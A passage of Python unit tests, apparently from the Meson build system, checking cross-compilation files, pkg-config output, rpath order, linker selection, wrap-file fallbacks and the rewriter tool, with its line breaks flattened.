for i in compdb: self.assertIn("-fsanitize=address", i["command"]) def test_cross_find_program(self): testdir = os.path.join(self.unit_test_dir, '11 cross prog') crossfile = tempfile.NamedTemporaryFile(mode='w') print(os.path.join(testdir, 'some_cross_tool.py')) tool_path = os.path.join(testdir, 'some_cross_tool.py') crossfile.write(textwrap.dedent(f'''\ [binaries] c = '{shutil.which('gcc' if is_sunos() else 'cc')}' ar = '{shutil.which('ar')}' strip = '{shutil.which('strip')}' sometool.py = ['{tool_path}'] someothertool.py = '{tool_path}' [properties] [host_machine] system = 'linux' cpu_family = 'arm' cpu = 'armv7' # Not sure if correct. endian = 'little' ''')) crossfile.flush() self.meson_cross_file = crossfile.name self.init(testdir) def test_reconfigure(self): testdir = os.path.join(self.unit_test_dir, '13 reconfigure') self.init(testdir, extra_args=['-Db_coverage=true'], default_args=False) self.build('reconfigure') def test_vala_generated_source_buildir_inside_source_tree(self): ''' Test that valac outputs generated C files in the expected location when the builddir is a subdir of the source tree. ''' if not shutil.which('valac'): raise unittest.SkipTest('valac not installed.') testdir = os.path.join(self.vala_test_dir, '8 generated sources') newdir = os.path.join(self.builddir, 'srctree') shutil.copytree(testdir, newdir) testdir = newdir # New builddir builddir = os.path.join(testdir, 'subdir/_build') os.makedirs(builddir, exist_ok=True) self.change_builddir(builddir) self.init(testdir) self.build() def test_old_gnome_module_codepaths(self): ''' A lot of code in the GNOME module is conditional on the version of the glib tools that are installed, and breakages in the old code can slip by once the CI has a newer glib version. So we force the GNOME module to pretend that it's running on an ancient glib so the fallback code is also tested. ''' testdir = os.path.join(self.framework_test_dir, '7 gnome') mesonbuild.modules.gnome.native_glib_version = '2.20' env = {'MESON_UNIT_TEST_PRETEND_GLIB_OLD': "1"} try: self.init(testdir, inprocess=True, override_envvars=env) self.build(override_envvars=env) finally: mesonbuild.modules.gnome.native_glib_version = None @skipIfNoPkgconfig def test_pkgconfig_usage(self): testdir1 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependency') testdir2 = os.path.join(self.unit_test_dir, '27 pkgconfig usage/dependee') if subprocess.call(['pkg-config', '--cflags', 'glib-2.0'], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) != 0: raise unittest.SkipTest('Glib 2.0 dependency not available.') with tempfile.TemporaryDirectory() as tempdirname: self.init(testdir1, extra_args=['--prefix=' + tempdirname, '--libdir=lib'], default_args=False) self.install(use_destdir=False) shutil.rmtree(self.builddir) os.mkdir(self.builddir) pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig') self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'libpkgdep.pc'))) lib_dir = os.path.join(tempdirname, 'lib') myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = pkg_dir # Private internal libraries must not leak out. pkg_out = subprocess.check_output(['pkg-config', '--static', '--libs', 'libpkgdep'], env=myenv) self.assertFalse(b'libpkgdep-int' in pkg_out, 'Internal library leaked out.') # Dependencies must not leak to cflags when building only a shared library. pkg_out = subprocess.check_output(['pkg-config', '--cflags', 'libpkgdep'], env=myenv) self.assertFalse(b'glib' in pkg_out, 'Internal dependency leaked to headers.') # Test that the result is usable. self.init(testdir2, override_envvars=myenv) self.build(override_envvars=myenv) myenv = os.environ.copy() myenv['LD_LIBRARY_PATH'] = ':'.join([lib_dir, myenv.get('LD_LIBRARY_PATH', '')]) if is_cygwin(): bin_dir = os.path.join(tempdirname, 'bin') myenv['PATH'] = bin_dir + os.pathsep + myenv['PATH'] self.assertTrue(os.path.isdir(lib_dir)) test_exe = os.path.join(self.builddir, 'pkguser') self.assertTrue(os.path.isfile(test_exe)) subprocess.check_call(test_exe, env=myenv) @skipIfNoPkgconfig def test_pkgconfig_relative_paths(self): testdir = os.path.join(self.unit_test_dir, '62 pkgconfig relative paths') pkg_dir = os.path.join(testdir, 'pkgconfig') self.assertTrue(os.path.exists(os.path.join(pkg_dir, 'librelativepath.pc'))) env = get_fake_env(testdir, self.builddir, self.prefix) env.coredata.set_options({'pkg_config_path': pkg_dir}, subproject='') kwargs = {'required': True, 'silent': True} relative_path_dep = PkgConfigDependency('librelativepath', env, kwargs) self.assertTrue(relative_path_dep.found()) # Ensure link_args are properly quoted libpath = Path(self.builddir) / '../relativepath/lib' link_args = ['-L' + libpath.as_posix(), '-lrelativepath'] self.assertEqual(relative_path_dep.get_link_args(), link_args) @skipIfNoPkgconfig def test_pkgconfig_internal_libraries(self): ''' ''' with tempfile.TemporaryDirectory() as tempdirname: # build library testdirbase = os.path.join(self.unit_test_dir, '32 pkgconfig use libraries') testdirlib = os.path.join(testdirbase, 'lib') self.init(testdirlib, extra_args=['--prefix=' + tempdirname, '--libdir=lib', '--default-library=static'], default_args=False) self.build() self.install(use_destdir=False) # build user of library pkg_dir = os.path.join(tempdirname, 'lib/pkgconfig') self.new_builddir() self.init(os.path.join(testdirbase, 'app'), override_envvars={'PKG_CONFIG_PATH': pkg_dir}) self.build() @skipIfNoPkgconfig def test_static_archive_stripping(self): ''' Check that Meson produces valid static archives with --strip enabled ''' with tempfile.TemporaryDirectory() as tempdirname: testdirbase = os.path.join(self.unit_test_dir, '67 static archive stripping') # build lib self.new_builddir() testdirlib = os.path.join(testdirbase, 'lib') testlibprefix = os.path.join(tempdirname, 'libprefix') self.init(testdirlib, extra_args=['--prefix=' + testlibprefix, '--libdir=lib', '--default-library=static', '--buildtype=debug', '--strip'], default_args=False) self.build() self.install(use_destdir=False) # build executable (uses lib, fails if static archive has been stripped incorrectly) pkg_dir = os.path.join(testlibprefix, 'lib/pkgconfig') self.new_builddir() self.init(os.path.join(testdirbase, 'app'), override_envvars={'PKG_CONFIG_PATH': pkg_dir}) self.build() @skipIfNoPkgconfig def test_pkgconfig_formatting(self): testdir = os.path.join(self.unit_test_dir, '38 pkgconfig format') self.init(testdir) myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = self.privatedir stdo = subprocess.check_output(['pkg-config', '--libs-only-l', 'libsomething'], env=myenv) deps = [b'-lgobject-2.0', b'-lgio-2.0', b'-lglib-2.0', b'-lsomething'] if is_windows() or is_cygwin() or is_osx() or is_openbsd(): # On Windows, libintl is a separate library deps.append(b'-lintl') self.assertEqual(set(deps), set(stdo.split())) @skipIfNoPkgconfig @skip_if_not_language('cs') def test_pkgconfig_csharp_library(self): testdir = os.path.join(self.unit_test_dir, '50 pkgconfig csharp library') self.init(testdir) myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = self.privatedir stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv) self.assertEqual("-r/usr/lib/libsomething.dll", str(stdo.decode('ascii')).strip()) @skipIfNoPkgconfig def test_pkgconfig_link_order(self): ''' Test that libraries are listed before their dependencies. ''' testdir = os.path.join(self.unit_test_dir, '53 pkgconfig static link order') self.init(testdir) myenv = os.environ.copy() myenv['PKG_CONFIG_PATH'] = self.privatedir stdo = subprocess.check_output(['pkg-config', '--libs', 'libsomething'], env=myenv) deps = stdo.split() self.assertTrue(deps.index(b'-lsomething') < deps.index(b'-ldependency')) def test_deterministic_dep_order(self): ''' Test that the dependencies are always listed in a deterministic order. ''' testdir = os.path.join(self.unit_test_dir, '43 dep order') self.init(testdir) with open(os.path.join(self.builddir, 'build.ninja')) as bfile: for line in bfile: if 'build myexe:' in line or 'build myexe.exe:' in line: self.assertIn('liblib1.a liblib2.a', line) return raise RuntimeError('Could not find the build rule') def test_deterministic_rpath_order(self): ''' Test that the rpaths are always listed in a deterministic order. ''' if is_cygwin(): raise unittest.SkipTest('rpath are not used on Cygwin') testdir = os.path.join(self.unit_test_dir, '42 rpath order') self.init(testdir) if is_osx(): rpathre = re.compile(r'-rpath,.*/subprojects/sub1.*-rpath,.*/subprojects/sub2') else: rpathre = re.compile(r'-rpath,\$\$ORIGIN/subprojects/sub1:\$\$ORIGIN/subprojects/sub2') with open(os.path.join(self.builddir, 'build.ninja')) as bfile: for line in bfile: if '-rpath' in line: self.assertRegex(line, rpathre) return raise RuntimeError('Could not find the rpath') def test_override_with_exe_dep(self): ''' Test that we produce the correct dependencies when a program is overridden with an executable. ''' testdir = os.path.join(self.src_root, 'test cases', 'native', '9 override with exe') self.init(testdir) with open(os.path.join(self.builddir, 'build.ninja')) as bfile: for line in bfile: if 'main1.c:' in line or 'main2.c:' in line: self.assertIn('| subprojects/sub/foobar', line) @skipIfNoPkgconfig def test_usage_external_library(self): ''' Test that uninstalled usage of an external library (from the system or PkgConfigDependency) works. On macOS, this workflow works out of the box. On Linux, BSDs, Windows, etc, you need to set extra arguments such as LD_LIBRARY_PATH, etc, so this test is skipped. The system library is found with cc.find_library() and pkg-config deps. ''' oldprefix = self.prefix # Install external library so we can find it testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'external library') # install into installdir without using DESTDIR installdir = self.installdir self.prefix = installdir self.init(testdir) self.prefix = oldprefix self.build() self.install(use_destdir=False) ## New builddir for the consumer self.new_builddir() env = {'LIBRARY_PATH': os.path.join(installdir, self.libdir), 'PKG_CONFIG_PATH': os.path.join(installdir, self.libdir, 'pkgconfig')} testdir = os.path.join(self.unit_test_dir, '40 external, internal library rpath', 'built library') # install into installdir without using DESTDIR self.prefix = self.installdir self.init(testdir, override_envvars=env) self.prefix = oldprefix self.build(override_envvars=env) # test uninstalled self.run_tests(override_envvars=env) if not (is_osx() or is_linux()): return # test running after installation self.install(use_destdir=False) prog = os.path.join(self.installdir, 'bin', 'prog') self._run([prog]) if not is_osx(): # Rest of the workflow only works on macOS return out = self._run(['otool', '-L', prog]) self.assertNotIn('@rpath', out) ## New builddir for testing that DESTDIR is not added to install_name self.new_builddir() # install into installdir with DESTDIR self.init(testdir, override_envvars=env) self.build(override_envvars=env) # test running after installation self.install(override_envvars=env) prog = self.installdir + os.path.join(self.prefix, 'bin', 'prog') lib = self.installdir + os.path.join(self.prefix, 'lib', 'libbar_built.dylib') for f in prog, lib: out = self._run(['otool', '-L', f]) # Ensure that the otool output does not contain self.installdir self.assertNotRegex(out, self.installdir + '.*dylib ') @skipIfNoPkgconfig def test_usage_pkgconfig_prefixes(self): ''' Build and install two external libraries, to different prefixes, then build and install a client program that finds them via pkgconfig, and verify the installed client program runs. ''' oldinstalldir = self.installdir # Build and install both external libraries without DESTDIR val1dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val1') val1prefix = os.path.join(oldinstalldir, 'val1') self.prefix = val1prefix self.installdir = val1prefix self.init(val1dir) self.build() self.install(use_destdir=False) self.new_builddir() env1 = {} env1['PKG_CONFIG_PATH'] = os.path.join(val1prefix, self.libdir, 'pkgconfig') val2dir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'val2') val2prefix = os.path.join(oldinstalldir, 'val2') self.prefix = val2prefix self.installdir = val2prefix self.init(val2dir, override_envvars=env1) self.build() self.install(use_destdir=False) self.new_builddir() # Build, install, and run the client program env2 = {} env2['PKG_CONFIG_PATH'] = os.path.join(val2prefix, self.libdir, 'pkgconfig') testdir = os.path.join(self.unit_test_dir, '76 pkgconfig prefixes', 'client') testprefix = os.path.join(oldinstalldir, 'client') self.prefix = testprefix self.installdir = testprefix self.init(testdir, override_envvars=env2) self.build() self.install(use_destdir=False) prog = os.path.join(self.installdir, 'bin', 'client') env3 = {} if is_cygwin(): env3['PATH'] = os.path.join(val1prefix, 'bin') + \ os.pathsep + \ os.path.join(val2prefix, 'bin') + \ os.pathsep + os.environ['PATH'] out = self._run([prog], override_envvars=env3).strip() # Expected output is val1 + val2 = 3 self.assertEqual(out, '3') def install_subdir_invalid_symlinks(self, testdir, subdir_path): ''' Test that installation of broken symlinks works fine. https://github.com/mesonbuild/meson/issues/3914 ''' testdir = os.path.join(self.common_test_dir, testdir) subdir = os.path.join(testdir, subdir_path) with chdir(subdir): # Can't distribute broken symlinks in the source tree because it breaks # the creation of zipapps. Create it dynamically and run the test by # hand. src = '../../nonexistent.txt' os.symlink(src, 'invalid-symlink.txt') try: self.init(testdir) self.build() self.install() install_path = subdir_path.split(os.path.sep)[-1] link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt') self.assertTrue(os.path.islink(link), msg=link) self.assertEqual(src, os.readlink(link)) self.assertFalse(os.path.isfile(link), msg=link) finally: os.remove(os.path.join(subdir, 'invalid-symlink.txt')) def test_install_subdir_symlinks(self): self.install_subdir_invalid_symlinks('60 install subdir', os.path.join('sub', 'sub1')) def test_install_subdir_symlinks_with_default_umask(self): self.install_subdir_invalid_symlinks('191 install_mode', 'sub2') def test_install_subdir_symlinks_with_default_umask_and_mode(self): self.install_subdir_invalid_symlinks('191 install_mode', 'sub1') @skipIfNoPkgconfigDep('gmodule-2.0') def test_ldflag_dedup(self): testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup') if is_cygwin() or is_osx(): raise unittest.SkipTest('Not applicable on Cygwin or OSX.') env = get_fake_env() cc = env.detect_c_compiler(MachineChoice.HOST) linker = cc.linker if not linker.export_dynamic_args(env): raise unittest.SkipTest('Not applicable for linkers without --export-dynamic') self.init(testdir) build_ninja = os.path.join(self.builddir, 'build.ninja') max_count = 0 search_term = '-Wl,--export-dynamic' with open(build_ninja, 'r', encoding='utf-8') as f: for line in f: max_count = max(max_count, line.count(search_term)) self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.') def test_compiler_libs_static_dedup(self): testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs') self.init(testdir) build_ninja = os.path.join(self.builddir, 'build.ninja') with open(build_ninja, 'r', encoding='utf-8') as f: lines = f.readlines() for lib in ('-ldl', '-lm', '-lc', '-lrt'): for line in lines: if lib not in line: continue # Assert that self.assertEqual(len(line.split(lib)), 2, msg=(lib, line)) @skipIfNoPkgconfig def test_noncross_options(self): # C_std defined in project options must be in effect also when native compiling. testdir = os.path.join(self.unit_test_dir, '51 noncross options') self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir]) compdb = self.get_compdb() self.assertEqual(len(compdb), 2) self.assertRegex(compdb[0]['command'], '-std=c99') self.assertRegex(compdb[1]['command'], '-std=c99') self.build() def test_identity_cross(self): testdir = os.path.join(self.unit_test_dir, '61 identity cross') nativefile = tempfile.NamedTemporaryFile(mode='w') nativefile.write(textwrap.dedent('''\ [binaries] c = ['{0}'] '''.format(os.path.join(testdir, 'build_wrapper.py')))) nativefile.flush() self.meson_native_file = nativefile.name crossfile = tempfile.NamedTemporaryFile(mode='w') crossfile.write(textwrap.dedent('''\ [binaries] c = ['{0}'] '''.format(os.path.join(testdir, 'host_wrapper.py')))) crossfile.flush() self.meson_cross_file = crossfile.name # TODO should someday be explicit about build platform only here self.init(testdir) def test_identity_cross_env(self): testdir = os.path.join(self.unit_test_dir, '61 identity cross') env = { 'CC_FOR_BUILD': '"' + os.path.join(testdir, 'build_wrapper.py') + '"', } crossfile = tempfile.NamedTemporaryFile(mode='w') crossfile.write(textwrap.dedent('''\ [binaries] c = ['{0}'] '''.format(os.path.join(testdir, 'host_wrapper.py')))) crossfile.flush() self.meson_cross_file = crossfile.name # TODO should someday be explicit about build platform only here self.init(testdir, override_envvars=env) @skipIfNoPkgconfig def test_static_link(self): if is_cygwin(): raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.") # Build some libraries and install them testdir = os.path.join(self.unit_test_dir, '68 static link/lib') libdir = os.path.join(self.installdir, self.libdir) oldprefix = self.prefix self.prefix = self.installdir self.init(testdir) self.install(use_destdir=False) # Test that installed libraries works self.new_builddir() self.prefix = oldprefix meson_args = ['-Dc_link_args=-L{}'.format(libdir), '--fatal-meson-warnings'] testdir = os.path.join(self.unit_test_dir, '68 static link') env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')} self.init(testdir, extra_args=meson_args, override_envvars=env) self.build() self.run_tests() def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None: if is_sunos(): raise unittest.SkipTest('Solaris currently cannot override the linker.') if not shutil.which(check): raise unittest.SkipTest('Could not find {}.'.format(check)) envvars = [mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]] # Also test a deprecated variable if there is one. if envvars[0] in mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP: envvars.append( mesonbuild.envconfig.BinaryTable.DEPRECATION_MAP[envvars[0]]) for envvar in envvars: with mock.patch.dict(os.environ, {envvar: name}): env = get_fake_env() comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST) if isinstance(comp, (mesonbuild.compilers.AppleClangCCompiler, mesonbuild.compilers.AppleClangCPPCompiler, mesonbuild.compilers.AppleClangObjCCompiler, mesonbuild.compilers.AppleClangObjCPPCompiler)): raise unittest.SkipTest('AppleClang is currently only supported with ld64') if lang != 'rust' and comp.use_linker_args('bfd') == []: raise unittest.SkipTest( 'Compiler {} does not support using alternative linkers'.format(comp.id)) self.assertEqual(comp.linker.id, expected) def test_ld_environment_variable_bfd(self): self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd') def test_ld_environment_variable_gold(self): self._check_ld('ld.gold', 'gold', 'c', 'ld.gold') def test_ld_environment_variable_lld(self): self._check_ld('ld.lld', 'lld', 'c', 'ld.lld') @skip_if_not_language('rust') @skipIfNoExecutable('ld.gold') # need an additional check here because _check_ld checks for gcc def test_ld_environment_variable_rust(self): self._check_ld('gcc', 'gcc -fuse-ld=gold', 'rust', 'ld.gold') def test_ld_environment_variable_cpp(self): self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold') @skip_if_not_language('objc') def test_ld_environment_variable_objc(self): self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold') @skip_if_not_language('objcpp') def test_ld_environment_variable_objcpp(self): self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold') @skip_if_not_language('fortran') def test_ld_environment_variable_fortran(self): self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold') @skip_if_not_language('d') def test_ld_environment_variable_d(self): # At least for me, ldc defaults to gold, and gdc defaults to bfd, so # let's pick lld, which isn't the default for either (currently) self._check_ld('ld.lld', 'lld', 'd', 'ld.lld') def compute_sha256(self, filename): with open(filename, 'rb') as f: return hashlib.sha256(f.read()).hexdigest() def test_wrap_with_file_url(self): testdir = os.path.join(self.unit_test_dir, '74 wrap file url') source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz') patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz') wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap') source_hash = self.compute_sha256(source_filename) patch_hash = self.compute_sha256(patch_filename) wrap = textwrap.dedent("""\ [wrap-file] directory = foo source_url = http://server.invalid/foo source_fallback_url = file://{} source_filename = foo.tar.xz source_hash = {} patch_url = http://server.invalid/foo patch_fallback_url = file://{} patch_filename = foo-patch.tar.xz patch_hash = {} """.format(source_filename, source_hash, patch_filename, patch_hash)) with open(wrap_filename, 'w') as f: f.write(wrap) self.init(testdir) self.build() self.run_tests() windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache')) windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo')) os.unlink(wrap_filename) def test_no_rpath_for_static(self): testdir = os.path.join(self.common_test_dir, '5 linkstatic') self.init(testdir) self.build() build_rpath = get_rpath(os.path.join(self.builddir, 'prog')) self.assertIsNone(build_rpath) def test_lookup_system_after_broken_fallback(self): # Just to generate libfoo.pc so we can test system dependency lookup. testdir = os.path.join(self.common_test_dir, '45 pkgconfig-gen') self.init(testdir) privatedir = self.privatedir # Write test project where the first dependency() returns not-found # because 'broken' subproject does not exit, but that should not prevent # the 2nd dependency() to lookup on system. self.new_builddir() with tempfile.TemporaryDirectory() as d: with open(os.path.join(d, 'meson.build'), 'w') as f: f.write(textwrap.dedent('''\ project('test') dependency('notfound', fallback: 'broken', required: false) dependency('libfoo', fallback: 'broken', required: true) ''')) self.init(d, override_envvars={'PKG_CONFIG_LIBDIR': privatedir}) def test_as_link_whole(self): testdir = os.path.join(self.unit_test_dir, '78 as link whole') self.init(testdir) with open(os.path.join(self.privatedir, 'bar1.pc')) as f: content = f.read() self.assertIn('-lfoo', content) with open(os.path.join(self.privatedir, 'bar2.pc')) as f: content = f.read() self.assertNotIn('-lfoo', content) class BaseLinuxCrossTests(BasePlatformTests): # Don't pass --libdir when cross-compiling. We have tests that # check whether meson auto-detects it correctly. libdir = None def should_run_cross_arm_tests(): return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm') @unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM") class LinuxCrossArmTests(BaseLinuxCrossTests): ''' Tests that cross-compilation to Linux/ARM works ''' def setUp(self): super().setUp() src_root = os.path.dirname(__file__) self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt') def test_cflags_cross_environment_pollution(self): ''' Test that the CFLAGS environment variable does not pollute the cross environment. This can't be an ordinary test case because we need to inspect the compiler database. ''' testdir = os.path.join(self.common_test_dir, '3 static') self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'}) compdb = self.get_compdb() self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command']) def test_cross_file_overrides_always_args(self): ''' Test that $lang_args in cross files always override get_always_args(). Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some architectures such as some Android versions and Raspbian. https://github.com/mesonbuild/meson/issues/3049 https://github.com/mesonbuild/meson/issues/3089 ''' testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args') self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt') self.init(testdir) compdb = self.get_compdb() self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS') self.build() def test_cross_libdir(self): # When cross compiling "libdir" should default to "lib" # rather than "lib/x86_64-linux-gnu" or something like that. testdir = os.path.join(self.common_test_dir, '1 trivial') self.init(testdir) for i in self.introspect('--buildoptions'): if i['name'] == 'libdir': self.assertEqual(i['value'], 'lib') return self.assertTrue(False, 'Option libdir not in introspect data.') def test_cross_libdir_subproject(self): # Guard against a regression where calling "subproject" # would reset the value of libdir to its default value. testdir = os.path.join(self.unit_test_dir, '77 subdir libdir') self.init(testdir, extra_args=['--libdir=fuf']) for i in self.introspect('--buildoptions'): if i['name'] == 'libdir': self.assertEqual(i['value'], 'fuf') return self.assertTrue(False, 'Libdir specified on command line gets reset.') def test_std_remains(self): # C_std defined in project options must be in effect also when cross compiling. testdir = os.path.join(self.unit_test_dir, '51 noncross options') self.init(testdir) compdb = self.get_compdb() self.assertRegex(compdb[0]['command'], '-std=c99') self.build() @skipIfNoPkgconfig def test_pkg_config_option(self): if not shutil.which('arm-linux-gnueabihf-pkg-config'): raise unittest.SkipTest('Cross-pkgconfig not found.') testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option') self.init(testdir, extra_args=[ '-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'), '-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'), ]) def should_run_cross_mingw_tests(): return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin()) @unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW") class LinuxCrossMingwTests(BaseLinuxCrossTests): ''' Tests that cross-compilation to Windows/MinGW works ''' def setUp(self): super().setUp() src_root = os.path.dirname(__file__) self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt') def test_exe_wrapper_behaviour(self): ''' Test that an exe wrapper that isn't found doesn't cause compiler sanity checks and compiler checks to fail, but causes configure to fail if it requires running a cross-built executable (custom_target or run_target) and causes the tests to be skipped if they are run. ''' testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour') # Configures, builds, and tests fine by default self.init(testdir) self.build() self.run_tests() self.wipe() os.mkdir(self.builddir) # Change cross file to use a non-existing exe_wrapper and it should fail self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt') # Force tracebacks so we can detect them properly env = {'MESON_FORCE_BACKTRACE': '1'} with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'): # Must run in-process or we'll get a generic CalledProcessError self.init(testdir, extra_args='-Drun-target=false', inprocess=True, override_envvars=env) with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'): # Must run in-process or we'll get a generic CalledProcessError self.init(testdir, extra_args='-Dcustom-target=false', inprocess=True, override_envvars=env) self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'], override_envvars=env) self.build() with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'): # Must run in-process or we'll get a generic CalledProcessError self.run_tests(inprocess=True, override_envvars=env) @skipIfNoPkgconfig def test_cross_pkg_config_option(self): testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option') self.init(testdir, extra_args=[ '-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'), '-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'), ]) class PythonTests(BasePlatformTests): ''' Tests that verify compilation of python extension modules ''' def test_versions(self): if self.backend is not Backend.ninja: raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name)) testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule') # No python version specified, this will use meson's python self.init(testdir) self.build() self.run_tests() self.wipe() # When specifying a known name, (python2 / python3) the module # will also try 'python' as a fallback and use it if the major # version matches try: self.init(testdir, extra_args=['-Dpython=python2']) self.build() self.run_tests() except unittest.SkipTest: # python2 is not necessarily installed on the test machine, # if it is not, or the python headers can't be found, the test # will raise MESON_SKIP_TEST, we could check beforehand what version # of python is available, but it's a bit of a chicken and egg situation, # as that is the job of the module, so we just ask for forgiveness rather # than permission. pass self.wipe() for py in ('pypy', 'pypy3'): try: self.init(testdir, extra_args=['-Dpython=%s' % py]) except unittest.SkipTest: # Same as above, pypy2 and pypy3 are not expected to be present # on the test system, the test project only raises in these cases continue # We have a pypy, this is expected to work self.build() self.run_tests() self.wipe() # The test is configured to error out with MESON_SKIP_TEST # in case it could not find python with self.assertRaises(unittest.SkipTest): self.init(testdir, extra_args=['-Dpython=not-python']) self.wipe() # While dir is an external command on both Windows and Linux, # it certainly isn't python with self.assertRaises(unittest.SkipTest): self.init(testdir, extra_args=['-Dpython=dir']) self.wipe() class RewriterTests(BasePlatformTests): def setUp(self): super().setUp() self.maxDiff = None def prime(self, dirname): copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir) def rewrite_raw(self, directory, args): if isinstance(args, str): args = [args] command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True, timeout=60) print('STDOUT:') print(p.stdout) print('STDERR:') print(p.stderr) if p.returncode != 0: if 'MESON_SKIP_TEST' in p.stdout: raise unittest.SkipTest('Project requested skipping.') raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout) if not p.stderr: return {} return json.loads(p.stderr) def rewrite(self, directory, args): if isinstance(args, str): args = [args] return self.rewrite_raw(directory, ['command'] + args) def test_target_source_list(self): self.prime('1 basic') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json')) expected = { 'target': { 'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']}, 'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']}, } } self.assertDictEqual(out, expected) def test_target_add_sources(self): self.prime('1 basic') out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json')) expected = { 'target': { 'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}, 'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']}, 'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']}, 'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']}, 'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']}, 'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}, 'trivialprog8@exe': {'name': 'trivialprog8', 